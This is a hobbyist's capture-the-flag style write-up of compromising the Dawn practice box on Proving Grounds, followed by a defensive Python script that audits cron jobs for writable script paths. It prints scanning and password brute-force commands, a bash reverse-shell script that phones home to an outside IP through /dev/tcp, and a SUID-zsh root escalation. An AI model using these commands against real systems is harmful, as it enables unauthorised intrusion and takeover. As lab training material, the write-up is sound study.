Hiya. It’s a rainy weekend and my favorite mtn biking trails are wet so I’m staying in to hack boxes all weekend.
Today’s is Dawn on Proving Grounds.

Proving Grounds is a series of vulnerable systems we hack for experience and learning.
You connect with OpenVPN so you have a point-to-point connection with the target IP address.
From there, we probe it and scan for vulnerabilities and misconfigurations for a way to take control of the box.
It’s an _excellent_ way of learning both Hacking skills and general Linux skills.

tl;dr
– Nmap to find 80, 139, 445, 3306 open
– The two main operational ports we'll use are 80 to get intel from a log file and 139/445 to upload a bash reverse TCP shell.
– tcp/80 with a vulnerable version of apache didn’t play a factor. (Might be a good backup)
– 139/445 smb empty share called ITDEPT but we can write to it.
– smbclient //192.168.112.11/ITDEPT -U dawn and upload a bash reverse shell then call it for reverse shell.
– 3306 – MariaDB/mysql, but hydra+rockyou couldn't crack it so probably a dead end
– In the target/logs/management.log we see a cron job entry for product-control, so a reverse shell uploaded under that name gets executed and phones home to our listener (#nc -nvlp 443). Priv esc!
– Once it connects back, do a find / -perm -4000 2> /dev/null to find suid bit binaries. (They can run as root)
– One is /usr/bin/zsh
– $zsh to get # and find the flags for points.

More details
– nmap to find 80, 139, 445, 3306 (MariaDB/mysql) open.
– Gobuster found directory indexing enabled on /logs (http://target/logs/). Notably, management.log had usernames; we had no perms for the other files (auth.log, error and daemon.log), but it did reveal a cron job running out of a directory we can write to. Easy peasy.
– Gobuster also found http://192.168.112.11/index.html – Under Construction.
– nmap -sSV found this:
80/tcp open http Apache httpd 2.4.38 ((Debian)) (Exploit available CVE-2019-0211)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
– Searchsploit those versions for an exploit found this:
– CVE-2019-0211 Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php
– It's not an RCE (Remote Code Execution); we'd need to already be running code as the Apache user (typically www-data), so we need a remote shell first.
– Ran hydra against mysql on 3306 using root/dawn as usernames + rockyou.txt, but it errored with "blocked because too many connection errors". Hydra has throttling syntax, but it was never going to work because of the server config.
– Let's try smb vs 445: smbclient -L //targetIP
Sharename  Type  Comment
print$     Disk  Printer Drivers
ITDEPT     Disk  PLEASE DO NOT REMOVE THIS SHARE.
IPC$       IPC   IPC Service (Samba 4.9.5-Debian)
– ITDEPT looks interesting.
– Connected with smbclient //192.168.112.11/ITDEPT -U dawn (no password but the share is empty)
– We can put files up to the share though. Maybe LFI? (Local file include for a reverse shell)
– Also with smbclient //192.168.112.11/IPC$ -U root (No password but empty directories)
– hydra -l root -P /home/loki/passes/rockyou.txt 192.168.112.11 mysql -t 1 -W 3 -f (Had to throttle)
! Hydra brute forcing pass for mysql probably won’t work. The throttling didn’t help. May be intentional.
– crackmapexec smb 192.168.112.11 --shares – doesn't find any shares like smbclient did. Weird.
– crackmapexec smb 192.168.112.11 -u '' -p '' --shares – Also doesn't show shares.
– ffuf -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt:FUZZ -u http://192.168.112.11/FUZZ -e .php,.txt -of html -o ffuf-scan.html -c
– Moving along, we have an SMB share to which we can write.
– So, we'll upload a bash reverse shell named product-control (the script the cron job runs as root) that looks like this:
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.169/443 0>&1
– Simply (lol) upload it to the smb share, set up a netcat listener with #nc -nvlp 443 and wait until the cron job runs.
– After a while, cron ran our script and we got a reverse shell automagically.
– Once we get local shell, do a $find / -perm -4000 2> /dev/null to find the suid bit binaries
– One is /usr/bin/zsh
– Drum roll, lol
– Just run zsh and you’re dumped into a root shell so then
– cat /home/dawn/local.txt
– cat /root/proof.txt for the flags and the win!
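Defender's aside, added here and not part of the original writeup: the whole chain hinges on a root cron job running a script out of a directory other users can write to (the ITDEPT share). This small Python audit parses /etc/crontab-style lines and flags exactly that. The paths in the fixture are constructed (a temp dir stands in for the share); the box's real on-disk path for product-control isn't stated above.

```python
"""Flag cron jobs whose script, or its parent directory, is group/world-writable."""
import os
import stat
import tempfile
from pathlib import Path


def parse_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text.
    Handles the five time fields plus user, '@reboot'-style shortcuts,
    comments, blank lines and VAR=value assignments."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split()
        if fields[0].startswith("@") and len(fields) >= 3:
            jobs.append((fields[1], fields[2]))
        elif len(fields) >= 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def writable_by_others(path):
    """True if the group or world write bit is set on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(crontab_text):
    """Return [(user, command, [reasons])] for jobs a non-owner could tamper with."""
    findings = []
    for user, command in parse_crontab(crontab_text):
        p = Path(command)
        if not p.is_absolute() or not p.exists():
            continue  # relative paths / missing files are a different problem
        reasons = []
        if writable_by_others(p):
            reasons.append("script is group/world-writable")
        if writable_by_others(p.parent):
            reasons.append("parent dir is group/world-writable")
        if reasons:
            findings.append((user, command, reasons))
    return findings


def demo():
    """Constructed fixture: a world-writable 'ITDEPT' dir (hypothetical path) holding a
    root cron script, next to a properly locked-down job for comparison."""
    base = Path(tempfile.mkdtemp())
    share, safe = base / "ITDEPT", base / "bin"
    share.mkdir(); os.chmod(share, 0o777)          # anyone can drop/replace files here
    safe.mkdir(); os.chmod(safe, 0o755)
    for d in (share / "product-control", safe / "backup.sh"):
        d.write_text("#!/bin/bash\n"); os.chmod(d, 0o755)
    crontab = (f"SHELL=/bin/sh\n# m h dom mon dow user command\n"
               f"*/2 * * * * root {share / 'product-control'}\n"
               f"0 3 * * * root {safe / 'backup.sh'}\n")
    return audit(crontab)
```

Running `demo()` reports only the product-control job, with the writable parent directory as the reason; the job in the 0755 directory passes.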

Great box.
Try one.
